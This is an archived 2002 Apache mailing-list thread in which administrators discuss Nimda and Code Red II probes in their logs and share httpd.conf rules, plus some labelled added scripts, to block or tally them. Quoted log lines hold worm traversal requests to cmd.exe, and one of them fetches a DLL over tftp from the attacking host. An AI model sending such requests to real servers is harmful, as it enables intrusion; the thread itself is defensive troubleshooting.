Posted to users@httpd.apache.org by Eduardo Gomez <in...@yahoo.com> on 2002/02/28 23:39:13 UTC

Code Red 2 attack

Hello:

I'm using Apache on Windows 2000.

In my apache error log I've found several entries which
(as far as I know) belong to Nimda and Red Code 2.
However, there's one that begins with about 15k of binary code
and ends with:

[Mon Feb 11 20:30:11 2002] [error] [client 61.152.254.1] Client sent malformed Host header

Does this mean someone may have successfully hacked me through this
malformed header attack?
Is it normal to find so much binary code in the error log?






---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: Code Red 2 attack

Posted by Eduardo Gomez <in...@yahoo.com>.
----- Original Message ----- 
From: "Alex "Sniper" Togstad" 

> I have kinda the same questions...
> Here is a snippet from my log:

> 12.224.157.6 - - [05/Feb/2002:02:59:08 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

[snipped]

> That's just Nimda attempts, correct?

Yes, as far as I know....but those are supposed to be harmless
to Apache. 






Re: Code Red 2 attack

Posted by Alex "Sniper" Togstad <sn...@3dretreat.com>.
I have kinda the same questions...

Here is a snippet from my log:

12.224.157.6 - - [05/Feb/2002:02:59:08 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:10 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:13 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:16 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:18 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
12.224.157.6 - - [05/Feb/2002:02:59:21 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
12.224.157.6 - - [05/Feb/2002:02:59:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
12.224.157.6 - - [05/Feb/2002:02:59:26 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303

That's just Nimda attempts, correct?

Apache 1.3.23 on Win2k

Thanx!


----- Original Message -----
From: "Eduardo Gomez" <in...@yahoo.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 2:39 PM
Subject: Code Red 2 attack




Re: Code Red 2 attack

Posted by Webmaster <we...@rolysvirtualpets.com>.
It only does any harm if you use IIS.

Eduardo Gomez wrote:


Re: Code Red 2 attack

Posted by Lewis Watson <li...@visionsix.com>.
Yup. It is really aggravating that they just sit there with infected, waste
of bandwidth munching systems and don't have the first clue that they are
even infected. It seems they would notice what their systems are doing....
but then again.....

Lewis Watson

----- Original Message -----
From: "Frank Reichenbacher" <fr...@mollynet.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 5:06 PM
Subject: Re: Code Red 2 attack


> Where have you been?
>
> My logs are full of probes from both the Nimda and Code Red worms and have
> been ever since they hit the streets last fall. I get hit every few seconds
> by infected computers on my ISP's network. These servers have been infected
> for many months and their admins are doing nothing about it.
>
> Frank
>
> ----- Original Message -----
> From: "Bill -OSX- Jones" <sn...@mac.com>
> To: <us...@httpd.apache.org>
> Sent: Thursday, February 28, 2002 4:06 PM
> Subject: Re: Code Red 2 attack
>
>
> > um, no ... Are you on Windows?
> >
> > On Thursday, February 28, 2002, at 05:39  PM, Eduardo Gomez wrote:
> > >
> > > Does this mean someone may have successfully hacked me through this
> > > malformed header attack?
> > > Is it normal to find so much binary code in the error log?
> > >
> >
> > ???
> > _Sx____________________
> >   ('>    -Sx- IUDICIUM
> >   //\   Have Computer -
> >   v_/_    Will Hack...
> >


Re: Code Red 2 attack

Posted by "Alex Blundell (aj)" <al...@btinternet.com>.
Follow up the IP that it came from is something to do with my ISP?!?!?!


----- Original Message -----
From: "Alex Blundell (aj)" <al...@btinternet.com>
To: <us...@httpd.apache.org>
Sent: Friday, March 01, 2002 8:40 AM
Subject: Re: Code Red 2 attack


> I have also had the same problem. On my first box it started in January and
> appears every 10 minutes in my logs. AND on my new box that has only been up
> a few weeks it's in my logs about 4 times?
>
> [Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
> exist: /var/www/html/MSADC/root.exe
> [Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
> exist: /var/www/html/c/winnt/system32/cmd.exe
>
> Can anyone explain this???
> AJ
>
> ----- Original Message -----
> From: "Bill -OSX- Jones" <sn...@mac.com>
> To: <us...@httpd.apache.org>
> Sent: Thursday, February 28, 2002 11:32 PM
> Subject: Re: Code Red 2 attack
>
>
> > busy - but I do know about the problem - anyhow, I apologize, I
> > didn't intend to imply this isn't a problem for some Apache admins.
> >
> > On Thursday, February 28, 2002, at 06:06  PM, Frank Reichenbacher wrote:
> >
> > But as I don't do Windows, I guess I never really cared.  So, to me,
> > it is really an issue of how fast can I ignore those requests...
> > _Sx____________________
> >   ('>    -Sx- IUDICIUM
> >   //\   Have Computer -
> >   v_/_    Will Hack...


Re: Code Red 2 attack

Posted by Mark Constable <ma...@renta.net>.
On Fri, 1 Mar 2002 19:33, Alex "Sniper" Togstad wrote:
> Is there a specific place to put this in the conf file? Every time I put it
> in the httpd.conf file, and restart apache it failed to restart. I delete
> the code, save and restart and it works again....

Yes, after any LoadModules section, and make sure these two are
uncommented... (these file paths are specific to a Debian system)

 LoadModule env_module /usr/lib/apache/1.3/mod_env.so
 LoadModule rewrite_module /usr/lib/apache/1.3/mod_rewrite.so

If you copied this snippet verbatim then the path to the logfile is probably
incorrect... in any case, watch your error.log while starting apache; that
will most likely tell you what is wrong.

> > CustomLog /www/logs/access_log combined env=!nolog

 cd /path/to/httpd.conf
 grep -i errorlog httpd.conf
 tail -f /path/to/error.log

--markc


> ----- Original Message -----
> From: "Erwien Samantha Y" <er...@netscape.net>
> To: <us...@httpd.apache.org>
> Sent: Friday, March 01, 2002 1:24 AM
> Subject: Re: Code Red 2 attack
>
> > add this in httpd.conf
> >
> > ##############################################
> > ##### Remove IIS worm From LOG ###############
> > #############################################
> > SetEnvIfNoCase Request_URI "^/scripts/"  nolog
> > SetEnvIfNoCase Request_URI "^/msadc/"    nolog
> > SetEnvIfNoCase Request_URI "^/MSADC/"    nolog
> > SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
> > SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
> > SetEnvIfNoCase Request_URI "^/c/winnt/"  nolog
> > SetEnvIfNoCase Request_URI "^/d/winnt/"  nolog
> > SetEnvIfNoCase Request_URI "^/default.ida" nolog
> > Redirect gone /scripts/
> > Redirect gone /msadc/
> > Redirect gone /MSADC/
> > Redirect gone /_vti_bin/
> > Redirect gone /_mem_bin/
> > Redirect gone /c/winnt/
> > Redirect gone /d/winnt/
> > Redirect gone /default.ida
> >
> > CustomLog /www/logs/access_log combined env=!nolog
> >
> > regards,
> >
> > wIEn.
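
As an added example (not code from the thread or from Apache), the Python script below parses access-log lines of the shape quoted earlier in this thread and classifies them with the same URI prefixes as the SetEnvIfNoCase rules above; instead of discarding the entries the way `CustomLog ... env=!nolog` does, it tallies them per client so an admin can see which hosts keep probing and whether any probe was ever answered with a 2xx. All function names are mine; the addresses 192.0.2.10 and 198.51.100.7 and the last three sample lines are constructed.

```python
"""Triage IIS-worm probes (Nimda / Code Red II) in an Apache access log.

Added example, not code from the thread or from Apache. It reuses the URI
prefixes of the SetEnvIfNoCase rules posted above and parses lines in the
shape of the excerpt quoted earlier in the thread. Rather than dropping
the entries as 'CustomLog ... env=!nolog' does, it tallies them per client
so an admin can see which hosts keep probing and whether any probe was
ever served.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# URI prefixes from the thread's SetEnvIfNoCase rules. SetEnvIfNoCase
# matches case-insensitively, so one lower-case entry covers /msadc/ and
# /MSADC/ alike once the path is lower-cased.
WORM_PREFIXES = ("/scripts/", "/msadc/", "/_vti_bin/", "/_mem_bin/",
                 "/c/winnt/", "/d/winnt/", "/default.ida")

# Common/combined log format up to the status and size fields.
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_clf(line):
    """Return the CLF fields as a dict, or None if the line does not parse."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def normalize_path(uri):
    """Strip the query string, percent-decode twice (the probes in the
    thread use %25 double encoding such as %252f) and lower-case, so every
    spelling of /scripts/ in the excerpt compares equal to the rule prefix."""
    path = uri.split("?", 1)[0]
    return unquote(unquote(path)).lower()


def is_worm_probe(uri):
    return normalize_path(uri).startswith(WORM_PREFIXES)


def triage(lines):
    """Tally worm probes per client.

    Returns {client: {"probes": n, "served": n}}. 'served' counts probes
    answered with 2xx; on an Apache host it should stay at zero and is the
    one figure worth checking before discarding these entries.
    """
    report = defaultdict(lambda: {"probes": 0, "served": 0})
    for line in lines:
        rec = parse_clf(line.rstrip("\n"))
        if rec is None or not is_worm_probe(rec["uri"]):
            continue
        entry = report[rec["host"]]
        entry["probes"] += 1
        if 200 <= rec["status"] < 300:
            entry["served"] += 1
    return dict(report)


def repeat_probers(report, min_probes=3):
    """Clients with at least min_probes probes, busiest first: the
    persistently infected hosts the thread complains about."""
    hits = [(host, e["probes"]) for host, e in report.items()
            if e["probes"] >= min_probes]
    return sorted(hits, key=lambda t: (-t[1], t[0]))


# Constructed sample log. Lines 1-3 are copied from the excerpt quoted in
# the thread; line 4 is built from the thread's error-log entry for
# 216.12.204.122; the last two (one ordinary request, one probe that was
# answered with 200) are made up to exercise the 'served' counter.
SAMPLE_LOG = """\
12.224.157.6 - - [05/Feb/2002:02:59:08 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:18 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
12.224.157.6 - - [05/Feb/2002:02:59:26 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
216.12.204.122 - - [27/Feb/2002:13:21:18 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 294
192.0.2.10 - - [28/Feb/2002:10:00:00 -0800] "GET /index.html HTTP/1.1" 200 1532
198.51.100.7 - - [28/Feb/2002:10:05:00 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 120
""".splitlines()

if __name__ == "__main__":
    rep = triage(SAMPLE_LOG)
    for host, counts in sorted(rep.items()):
        print(f"{host:16} probes={counts['probes']} served={counts['served']}")
    print("repeat probers:", repeat_probers(rep))
```

Against a real log, `triage(open("/www/logs/access_log"))` gives the same report; a non-zero 'served' count is the entry to investigate, not the 404s.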



Re: Code Red 2 attack

Posted by Erwien Samantha Y <er...@netscape.net>.

It will be useless if you have TransferLog active.

sniper@3dretreat.com wrote:


-- 
-==  HonesT Is The BesT PoLicY ==-
         -----------------






Re: Code Red 2 attack

Posted by ar...@cosmic.net.au.
Also,
I think you may have to have those modules loaded first with LoadModule
before you try to use the functions/directives that it contains.

Just a thought if you're using DSO modules.
I'm sure someone will correct me if I'm wrong :)



On Fri, 1 Mar 2002, Hasanuddin Tamir wrote:



Re: Code Red 2 attack

Posted by Hasanuddin Tamir <sa...@trabas.com>.
You can basically put it anywhere in the conf file.

SetEnvIfNoCase is handled by mod_setenvif, Redirect is handled by
mod_alias, and CustomLog is handled by mod_log_config. Check those
modules in one or both of these places,

    a. /usr/local/apache/bin/httpd -l
       mod_setenvif.c
       mod_alias.c
       mod_log_config.c

    b. ls /usr/local/apache/libexec
       mod_setenvif.so
       mod_alias.so
       mod_log_config.so

Adjust the actual path according to your local setting.

-- 
san->http(www.trabas.com)
{If Linux doesn't have solution, you have the wrong problem}

On Fri, 1 Mar 2002, Alex "Sniper" Togstad <sn...@3dretreat.com> wrote,

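
Mark Constable's reply, the reply from cosmic.net.au and Hasanuddin Tamir's reply above all make the same point about the posted snippet: SetEnvIfNoCase, Redirect and CustomLog only work if mod_setenvif, mod_alias and mod_log_config are compiled in or loaded, and with DSO modules the LoadModule line has to come before the directive. This added shell script (not from the thread) checks both conditions against an httpd.conf and a saved copy of `httpd -l` output; the function names and the paths in its demo input are assumptions.

```sh
#!/bin/sh
# Added example, not from the thread. Checks the two things the replies
# point at when the posted snippet stops Apache restarting: the modules
# behind SetEnvIfNoCase, Redirect and CustomLog must be compiled in
# ('httpd -l') or loaded by an uncommented LoadModule line, and with DSOs
# that LoadModule line must precede the directive. Paths are assumptions.

# Module name stem each directive in the snippet depends on.
NEEDED="setenvif alias log_config"

# missing_modules <httpd.conf> <file holding 'httpd -l' output>
# Prints the needed modules that are neither compiled in nor loaded.
missing_modules() {
    conf=$1
    static=$2
    missing=""
    for mod in $NEEDED; do
        if grep -q "mod_${mod}\.c" "$static"; then
            continue
        fi
        if grep -Eq "^[[:space:]]*LoadModule[[:space:]]+${mod}_module[[:space:]]" "$conf"; then
            continue
        fi
        missing="$missing $mod"
    done
    echo "${missing# }"
}

# early_directives <httpd.conf>
# Prints '<line>: <directive>' for snippet directives that sit before the
# last LoadModule line; a DSO-built httpd reads the file top to bottom and
# rejects a directive whose module has not been loaded yet.
early_directives() {
    awk '
        /^[[:space:]]*LoadModule[[:space:]]/ { last = NR }
        /^[[:space:]]*(SetEnvIfNoCase|Redirect|CustomLog)[[:space:]]/ { d[NR] = $1 }
        END { for (n in d) if (n + 0 < last) print n ": " d[n] }
    ' "$1" | sort -n
}

# Constructed demo input: a conf with part of the snippet pasted above the
# LoadModule lines and mod_log_config's line commented out, plus a fake
# 'httpd -l' listing with only a few modules compiled in.
demo() {
    dir=$(mktemp -d)
    cat > "$dir/httpd.conf" <<'EOF'
SetEnvIfNoCase Request_URI "^/scripts/" nolog
Redirect gone /scripts/
LoadModule env_module /usr/lib/apache/1.3/mod_env.so
LoadModule setenvif_module /usr/lib/apache/1.3/mod_setenvif.so
#LoadModule log_config_module /usr/lib/apache/1.3/mod_log_config.so
CustomLog /www/logs/access_log combined env=!nolog
EOF
    printf 'http_core.c\nmod_so.c\nmod_alias.c\n' > "$dir/static"
    echo "not available: $(missing_modules "$dir/httpd.conf" "$dir/static")"
    echo "directives before the last LoadModule:"
    early_directives "$dir/httpd.conf"
    rm -rf "$dir"
}

demo
```

On a live host, save `httpd -l` output to a file first and point both functions at the real httpd.conf; an empty result from each is what a clean restart needs.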


Re: Code Red 2 attack

Posted by Alex "Sniper" Togstad <sn...@3dretreat.com>.
Is there a specific place to put this in the conf file? Every time I put it
in the httpd.conf file, and restart apache it failed to restart. I delete
the code, save and restart and it works again....

thanx!

----- Original Message -----
From: "Erwien Samantha Y" <er...@netscape.net>
To: <us...@httpd.apache.org>
Sent: Friday, March 01, 2002 1:24 AM
Subject: Re: Code Red 2 attack


> add this in httpd.conf
>
> ##############################################
> ##### Remove IIS worm From LOG ###############
> #############################################
> SetEnvIfNoCase Request_URI "^/scripts/"  nolog
> SetEnvIfNoCase Request_URI "^/msadc/"    nolog
> SetEnvIfNoCase Request_URI "^/MSADC/"    nolog
> SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
> SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
> SetEnvIfNoCase Request_URI "^/c/winnt/"  nolog
> SetEnvIfNoCase Request_URI "^/d/winnt/"  nolog
> SetEnvIfNoCase Request_URI "^/default.ida" nolog
> Redirect gone /scripts/
> Redirect gone /msadc/
> Redirect gone /MSADC/
> Redirect gone /_vti_bin/
> Redirect gone /_mem_bin/
> Redirect gone /c/winnt/
> Redirect gone /d/winnt/
> Redirect gone /default.ida
>
> CustomLog /www/logs/access_log combined env=!nolog
>
> regards,
>
> wIEn.
>
>
> alexblundell@btinternet.com wrote:
>
> >I have a;so had the same problem, On my first box it started in January
and
> >apeares every 10 minutes in my logs. AND on my new box that has only been
up
> >a few weeks its in my logs about 4 times?
> >
> >[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
> >exist: /var/www/html/MSADC/root.exe
> >[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
> >exist: /var/www/html/c/winnt/system32/cmd.exe
> >
> >Can anyone explain this???
> >AJ
> >
> >----- Original Message -----
> >From: "Bill -OSX- Jones" <sn...@mac.com>
> >To: <us...@httpd.apache.org>
> >Sent: Thursday, February 28, 2002 11:32 PM
> >Subject: Re: Code Red 2 attack
> >
> >
> >>busy - but I do know about the problem - anyhow, I apologize, I
> >>didn't intend to imply this isn't a problem for some Apache admins.
> >>
> >>On Thursday, February 28, 2002, at 06:06  PM, Frank Reichenbacher wrote:
> >>
> >>>Where have you been?
> >>>
> >>>My logs are full of probes from both the Nimda and Code Red worms
> >>>and have
> >>>been ever since they hit the streets last fall. I get hit every
> >>>few seconds
> >>>by infected computers on my ISP's network. These servers have been
> >>>infected
> >>>for many months and their admins are doing nothing about it.
> >>>
> >>
> >>But as I don't do Windows, I guess I never really cared.  So, to me,
> >>it is really an issue of how fast can I ignore those requests...
> >>_Sx____________________
> >>  ('>    -Sx- IUDICIUM
> >>  //\   Have Computer -
> >>  v_/_    Will Hack...
> >>
> >>
> >
> >
>
> --
> -==  HonesT Is The BesT PoLicY ==-
>          -----------------
>
>
>
>





Re: Code Red 2 attack

Posted by Erwien Samantha Y <er...@netscape.net>.
add this in httpd.conf 

##############################################
##### Remove IIS worm From LOG ###############
#############################################
# Needs mod_setenvif (SetEnvIfNoCase), mod_alias (Redirect) and the "combined"
# nickname defined by a LogFormat line earlier in httpd.conf. CustomLog is only
# valid in the main server config or a <VirtualHost>, not inside <Directory>.
# Run "httpd -t" (Apache.exe -t on the Windows build) to see the parse error
# instead of guessing why the restart fails.
SetEnvIfNoCase Request_URI "^/scripts/"  nolog
SetEnvIfNoCase Request_URI "^/msadc/"    nolog
SetEnvIfNoCase Request_URI "^/MSADC/"    nolog
SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
SetEnvIfNoCase Request_URI "^/c/winnt/"  nolog
SetEnvIfNoCase Request_URI "^/d/winnt/"  nolog
SetEnvIfNoCase Request_URI "^/default\.ida" nolog
# Redirect matches the URL-path prefix case-sensitively (hence both spellings of
# msadc); "gone" answers the probe with 410 and no Location header. Caveat: any
# real /scripts/ etc. your own site serves gets the same 410.
Redirect gone /scripts/
Redirect gone /msadc/
Redirect gone /MSADC/
Redirect gone /_vti_bin/
Redirect gone /_mem_bin/
Redirect gone /c/winnt/
Redirect gone /d/winnt/
Redirect gone /default.ida

# Log everything except requests tagged nolog; the log directory must exist.
CustomLog /www/logs/access_log combined env=!nolog

regards,

wIEn.


alexblundell@btinternet.com wrote:

>I have also had the same problem. On my first box it started in January and
>appears every 10 minutes in my logs. AND on my new box that has only been up
>a few weeks it's in my logs about 4 times?
>
>[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
>exist: /var/www/html/MSADC/root.exe
>[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
>exist: /var/www/html/c/winnt/system32/cmd.exe
>
>Can anyone explain this???
>AJ
>
>----- Original Message -----
>From: "Bill -OSX- Jones" <sn...@mac.com>
>To: <us...@httpd.apache.org>
>Sent: Thursday, February 28, 2002 11:32 PM
>Subject: Re: Code Red 2 attack
>
>
>>busy - but I do know about the problem - anyhow, I apologize, I
>>didn't intend to imply this isn't a problem for some Apache admins.
>>
>>On Thursday, February 28, 2002, at 06:06  PM, Frank Reichenbacher wrote:
>>
>>>Where have you been?
>>>
>>>My logs are full of probes from both the Nimda and Code Red worms
>>>and have
>>>been ever since they hit the streets last fall. I get hit every
>>>few seconds
>>>by infected computers on my ISP's network. These servers have been
>>>infected
>>>for many months and their admins are doing nothing about it.
>>>
>>
>>But as I don't do Windows, I guess I never really cared.  So, to me,
>>it is really an issue of how fast can I ignore those requests...
>>_Sx____________________
>>  ('>    -Sx- IUDICIUM
>>  //\   Have Computer -
>>  v_/_    Will Hack...
>>
>>
>
>

-- 
-==  HonesT Is The BesT PoLicY ==-
         -----------------






Re: Code Red 2 attack

Posted by Bill -OSX- Jones <sn...@mac.com>.
The infected system wants to infect yours - nothing to explain.

On Friday, March 1, 2002, at 03:40  AM, Alex Blundell ((aj)) wrote:

> Can anyone explain this???
> AJ
>

_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...




Re: Code Red 2 attack

Posted by "Alex Blundell (aj)" <al...@btinternet.com>.
I have also had the same problem. On my first box it started in January and
appears every 10 minutes in my logs. AND on my new box that has only been up
a few weeks it's in my logs about 4 times?

[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
exist: /var/www/html/MSADC/root.exe
[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
exist: /var/www/html/c/winnt/system32/cmd.exe

Can anyone explain this???
AJ

----- Original Message -----
From: "Bill -OSX- Jones" <sn...@mac.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 11:32 PM
Subject: Re: Code Red 2 attack


> busy - but I do know about the problem - anyhow, I apologize, I
> didn't intend to imply this isn't a problem for some Apache admins.
>
> On Thursday, February 28, 2002, at 06:06  PM, Frank Reichenbacher wrote:
>
> > Where have you been?
> >
> > My logs are full of probes from both the Nimda and Code Red worms
> > and have
> > been ever since they hit the streets last fall. I get hit every
> > few seconds
> > by infected computers on my ISP's network. These servers have been
> > infected
> > for many months and their admins are doing nothing about it.
> >
>
>
> But as I don't do Windows, I guess I never really cared.  So, to me,
> it is really an issue of how fast can I ignore those requests...
> _Sx____________________
>   ('>    -Sx- IUDICIUM
>   //\   Have Computer -
>   v_/_    Will Hack...
>
>




Re: Code Red 2 attack

Posted by Jim Hribnak <hr...@nucleus.com>.
It still boggles my mind that people are still getting infected with this
worm.  I run a Nimda troll that will do an auto email to the IP netblock
owner.. Even still it goes on and on and on.  Since Oct 25 2001 till today
(Mar 4 2002) I have sent out (automatically) close to 4,100 complaints about
machines hitting our servers looking for Winblows machines that could be
infected.

Here is the URL (I did not write this)

http://www.digitalcon.ca/nimda/

It's a pretty good CGI; you no longer have to manually file your complaints.



----- Original Message -----
From: "Bill -OSX- Jones" <sn...@mac.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 4:45 PM
Subject: Re: Code Red 2 attack


> Please ignore my last inquiry, the following does what I want for
> the time being:
>
> # Check for Code Red IIS/Windows Hacking nonsense...
>    RewriteCond %{REQUEST_FILENAME} /winnt/          [NC,OR]
>    RewriteCond %{REQUEST_FILENAME} /system32/       [NC,OR]
>    RewriteCond %{REQUEST_FILENAME} \.ida.*$         [NC,OR]
>    RewriteCond %{REQUEST_FILENAME} \.exe.*$         [NC,OR]
>    RewriteCond %{REQUEST_FILENAME} \.com.*$         [NC,OR]
>    RewriteCond %{REQUEST_FILENAME} \.dll.*$         [NC]
>    RewriteRule ^.*$ http://insecurity.org/403.shtml [L]
> #  RewriteRule ^.*$ http://insecurity.org/notwindows.html [L]
>
>
> Thx  :]
> _Sx____________________
>   ('>    -Sx- IUDICIUM
>   //\   Have Computer -
>   v_/_    Will Hack...
>
>




Re: Code Red 2 attack

Posted by Bill -OSX- Jones <sn...@mac.com>.
Please ignore my last inquiry, the following does what I want for 
the time being:

# Check for Code Red IIS/Windows Hacking nonsense...
# (mod_rewrite must be loaded and "RewriteEngine On" set before this block)
   RewriteCond %{REQUEST_FILENAME} /winnt/          [NC,OR]
   RewriteCond %{REQUEST_FILENAME} /system32/       [NC,OR]
   RewriteCond %{REQUEST_FILENAME} \.ida.*$         [NC,OR]
   RewriteCond %{REQUEST_FILENAME} \.exe.*$         [NC,OR]
   RewriteCond %{REQUEST_FILENAME} \.com.*$         [NC,OR]
   RewriteCond %{REQUEST_FILENAME} \.dll.*$         [NC]
# An absolute URL as the target makes mod_rewrite answer with an external
# redirect; "RewriteRule ^.*$ - [F]" would return 403 locally instead of
# pointing the worm at another host.
   RewriteRule ^.*$ http://insecurity.org/403.shtml [L]
#  RewriteRule ^.*$ http://insecurity.org/notwindows.html [L]


		Thx  :]
_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...




Re: Code Red 2 attack

Posted by Bill -OSX- Jones <sn...@mac.com>.
busy - but I do know about the problem - anyhow, I apologize, I 
didn't intend to imply this isn't a problem for some Apache admins.

On Thursday, February 28, 2002, at 06:06  PM, Frank Reichenbacher wrote:

> Where have you been?
>
> My logs are full of probes from both the Nimda and Code Red worms 
> and have
> been ever since they hit the streets last fall. I get hit every 
> few seconds
> by infected computers on my ISP's network. These servers have been 
> infected
> for many months and their admins are doing nothing about it.
>


But as I don't do Windows, I guess I never really cared.  So, to me,
it is really an issue of how fast can I ignore those requests...
_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...




Re: Code Red 2 attack

Posted by Frank Reichenbacher <fr...@mollynet.com>.
Where have you been?

My logs are full of probes from both the Nimda and Code Red worms and have
been ever since they hit the streets last fall. I get hit every few seconds
by infected computers on my ISP's network. These servers have been infected
for many months and their admins are doing nothing about it.

Frank

----- Original Message -----
From: "Bill -OSX- Jones" <sn...@mac.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 4:06 PM
Subject: Re: Code Red 2 attack


> um, no ... Are you on Windows?
>
> On Thursday, February 28, 2002, at 05:39  PM, Eduardo Gomez wrote:
> >
> > Does this mean someone may have successfully hacked me through this
> > malformed header attack?
> > Is it normal to find so much binary code in the error log?
> >
>
> ???
> _Sx____________________
>   ('>    -Sx- IUDICIUM
>   //\   Have Computer -
>   v_/_    Will Hack...
>
>




Re: Code Red 2 attack

Posted by Bill -Sx- Jones <sn...@mac.com>.
On 3/2/02 2:50 AM, "Eduardo Gomez" <in...@yahoo.com> wrote:

> brought Commodore down, I'd probably still be an Amiga user.


Amiga - they still have coolness.

-Sx-  :]





Re: Code Red 2 attack

Posted by Eduardo Gomez <in...@yahoo.com>.
> > what I got in my error log was a bunch 
> > of binary
> > code which, when examined in a hex editor, showed to be related to 
> > modems

> Are you on Windows?  RU running (walking) with Apache on Windows?
> Sorry, but I just want to know.

You mean crawling on Windows? Yeah... But if the Wintel mafia hadn't 
brought Commodore down, I'd probably still be an Amiga user. 

_____________________
Eduardo Gomez
Innerlab Productions
info@innerlab.com
www.innerlab.com





Re: Code Red 2 attack

Posted by Bill -OSX- Jones <sn...@mac.com>.
Again I ask -

On Friday, March 1, 2002, at 07:41  AM, Eduardo Gomez wrote:

> The error logs which have been mentioned so far in this thread, like:
>
>> 207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET
>> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%
>
> I know they are Nimda, and it is my understanding that apache is not
> vulnerable to these. Now, what I got in my error log was a bunch 
> of binary
> code which, when examined in a hex editor, showed to be related to 
> modems
> ...

Are you on Windows?  RU running (walking) with Apache on Windows?

Sorry, but I just want to know.
_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...




Re: Code Red 2 attack

Posted by Eduardo Gomez <in...@yahoo.com>.
I started this particular thread, and by the way, I am new to web servers in
general, and I have no clue about the scripting used by Apache, which I assume
is Unix or something like that. I'm using Apache on Windows. Now that you have
been made aware of my ignorance, I'd like to add something:

The error logs which have been mentioned so far in this thread, like:

> 207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%

I know they are Nimda, and it is my understanding that Apache is not
vulnerable to these. Now, what I got in my error log was a bunch of binary
code which, when examined in a hex editor, showed to be related to modem
drivers, audio control, and other stuff. After 15 KB the whole thing seems to
have been rejected by Apache as a malformed header.  I am very curious to
know what this was, if it's common to find such code in the error log (as
opposed to strings like the one quoted above) and if it means a
(successful?) attempt to introduce and activate an executable on my machine.
If someone wants to examine the binary code I found, I would happily email
it. Thanks in advance.

_____________________
Eduardo Gomez
Innerlab Productions
info@innerlab.com
www.innerlab.com




Re: Code Red 2 attack

Posted by Bill -OSX- Jones <sn...@mac.com>.
Here's an example -

207.86.144.105 - - [28/Feb/2002:02:38:32 -0500] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 200 1942 "-" "-"

... 72 practically identical lines deleted ...

207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.
dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"
207.86.144.105 - - [28/Feb/2002:02:38:39 -0500] "GET 
/scripts/..%252f../Admin.dll HTTP/1.0" 200 1950 "-" "-"

...

But I still feel warm and snuggly inside  :)

Anyhow, earlier I posted a mod_rewrite question that went by 
somewhat unnoticed, so please allow me to try once more -- then if 
no one responds I will go back into my semi-annual hibernation  :)

I want to test for
RewriteCond %{REQUEST_FILENAME} \.ida.+$ [NC,OR]
